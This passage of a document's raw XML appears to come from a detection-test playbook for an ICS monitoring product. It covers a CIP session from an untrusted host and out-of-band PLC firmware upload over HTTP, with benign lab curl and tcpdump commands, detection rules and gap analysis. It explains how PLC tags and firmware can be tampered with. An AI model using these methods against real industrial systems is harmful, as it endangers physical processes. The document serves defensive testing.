              </w:rPr>
              <w:t># Capture:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#   sudo tcpdump -i eth1 -w scenario10_eip.pcap host 10.10.2.30 and port 44818</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If the lab has no real ControlLogix, use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OpENer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (open-source EIP server).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OTShield's protocol dissector currently labels EIP traffic generically as TCP/44818 without parsing CIP — the connection is visible but not the CIP function.</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(none) — CIP not parsed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.cip_session_origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Register Session from an IP not on the engineering-workstation allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0859 — Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Today: TCP/44818 connection appears in observed-connections; no DPI event rows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Workaround: cross-reference asset inventory — if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.20.0.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not tagged as an engineering workstation but has a 44818 connection to a PLC, escalate manually.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After dissector + rule: anomaly title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Untrusted CIP session origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cip_function:Forward_Open target_class:0x02 target_instance:1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Allen-Bradley dominates the North American discrete manufacturing space — automotive, food &amp; beverage, pharmaceutical. CIP exposure is everywhere:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Tag write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — once the session is open, writing a tag is a single CIP request. Equivalent to Modbus FC 0x06 but with named tags instead of register numbers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Firmware-level access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CIP supports vendor-specific objects that can read PLC firmware version, identity, and on some models perform firmware updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cross-vendor scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — same protocol covers AB, Omron, several VFDs and drives. One detection capability, broad coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Same shape as DNP3 — dissector first, then rule:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>EIP/CIP dissector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — parse Encapsulation header (command, session handle), CPF items, and at least the CIP service code + class/instance. Schema mirrors </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DpiEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (functionCode = CIP service, functionName = service name).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.cip_session_origin rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fire on Register Session from non-allowlisted IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vendor-object awareness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — flag CIP class 0x01 (Identity), 0x06 (Connection Manager), 0xAC (Module) as 'maintenance' actions worth elevated severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 11  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>PLC firmware upload via HTTP (out-of-band)</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T0857 — System Firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIGH (partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Many modern PLCs (S7-1500, Schneider M580, ABB AC500) expose a built-in web server on TCP/80 or 443 that supports firmware upload via HTTP POST. An attacker bypasses the engineering protocol entirely by POSTing a malicious firmware image to the PLC's `/upload` endpoint. The DPI dissector for ICS protocols never sees this traffic — but cross-zone HTTP from L3 to L1 is itself anomalous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Even without a real malicious image, demonstrating the L3 → L1 HTTP session is enough — OTShield's observed-connections layer catches the edge regardless of payload.</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scenario11_plc_http_firmware.sh</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Stand up a benign HTTP request to the PLC web UI</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>curl -v http://10.10.2.20/ \</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --resolve 10.10.2.20:80:10.10.2.20 \</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --interface 10.20.0.50    # source from L3</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># For a noisier reproduction (still benign):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>for i in $(seq 1 20); do</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  curl -s http://10.10.2.20/api/status &gt; /dev/null</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>done</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Capture:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#   sudo tcpdump -i eth1 -w scenario11_plc_http.pcap host 10.10.2.20 and port 80</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Some lab PLC simulators (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OpenPLC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) do not expose a web server. Use any HTTP endpoint on the PLC IP — what matters for OTShield is the L3→L1 TCP session, not the HTTP semantics.</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(partial) cross-zone observed-connection edge appears in topology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.cross_zone_http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP/HTTPS session from L3+ to L1/L0 with method POST or PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0857 — System Firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Topology immediately shows a new edge L3 → L1 labelled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>TCP/80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Edge is amber (observed but no anomaly), not red.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Topology → DPI modal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the edge → 'No DPI events parsed' message confirms the gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After the gap rule lands: red edge with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cross-zone HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> anomaly, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>http_method:POST http_path:/upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>HTTP-based firmware flashing is the easiest persistence vector that bypasses every ICS protocol detection layer in the industry today:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Firmware-level persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — survives PLC project re-download. Equivalent outcome to scenario 06 but invisible to S7Comm-only detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>No engineering tools required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — any host with curl can attempt this. Lowers the attacker skill floor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vendor blind spot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — most ICS-aware NIDS focus on engineering protocols and treat the PLC web UI as 'corporate IT'. OTShield's zone-based approach catches it for free.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Foundational topology already detects this; the missing piece is the rule that turns the amber edge into a red anomaly with explicit reasoning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.cross_zone_http rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fire on any HTTP/HTTPS observed-connection where src Purdue level &gt; dst level. Mirror UnauthorizedWriteRule severity ladder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Lightweight HTTP dissector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extract Method + Host + Path. We don't need full HTTP parsing; matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
